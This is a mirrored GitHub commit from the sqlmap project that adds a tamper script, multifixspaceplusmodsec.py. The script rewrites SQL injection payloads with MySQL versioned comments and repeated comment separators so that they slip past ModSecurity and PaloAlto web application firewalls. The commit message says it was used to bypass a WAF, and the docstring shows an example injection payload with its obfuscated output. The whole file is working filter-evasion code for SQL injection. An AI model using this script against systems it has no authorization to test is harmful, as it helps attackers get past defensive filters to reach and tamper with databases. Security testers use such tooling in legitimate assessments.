mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-29 01:19:47 +03:00
created a tamper script that embrances mod zero-version plus multi spaces in one, this is the script that I used to bypass the WAF as mentioned in issue #2749
This commit is contained in:
parent
cc37b12d37
commit
91551e7239
39
tamper/multifixspaceplusmodsec.py
Normal file
39
tamper/multifixspaceplusmodsec.py
Normal file
|
@ -0,0 +1,39 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'LICENSE' for copying permission
|
||||
"""
|
||||
|
||||
from lib.core.enums import PRIORITY
|
||||
|
||||
__priority__ = PRIORITY.NORMAL
|
||||
|
||||
def dependencies():
|
||||
pass
|
||||
|
||||
def tamper(payload, **kwargs):
|
||||
"""
|
||||
Embraces ModSecurity zero-versioned bypass and multiple space to comment bypass in one
|
||||
|
||||
Requirements:
|
||||
* MySQL >= 5.0
|
||||
|
||||
Tested against:
|
||||
* MySQL <= 5.0
|
||||
* MySQL >= 5.0
|
||||
|
||||
Notes:
|
||||
* Can be used to bypass PaloAlto and ModSecurity WAF/IPS
|
||||
|
||||
>>> tamper("1) AND 6362=9217 AND (7458=7458")
|
||||
/*!000001)*//**//**//**//*!00000AND*//**//**//**//*!000006362=9217*//**//**//**//*!00000AND*//**//**//**//*!00000(7458=7458*/
|
||||
"""
|
||||
if payload:
|
||||
retVal = []
|
||||
amountToReplace = 3
|
||||
|
||||
for data in payload.split(" "):
|
||||
retVal.append("/*!00000%s*/" % data)
|
||||
|
||||
return '%s' % ('/**/' * amountToReplace).join(retVal)
|
Loading…
Reference in New Issue
Block a user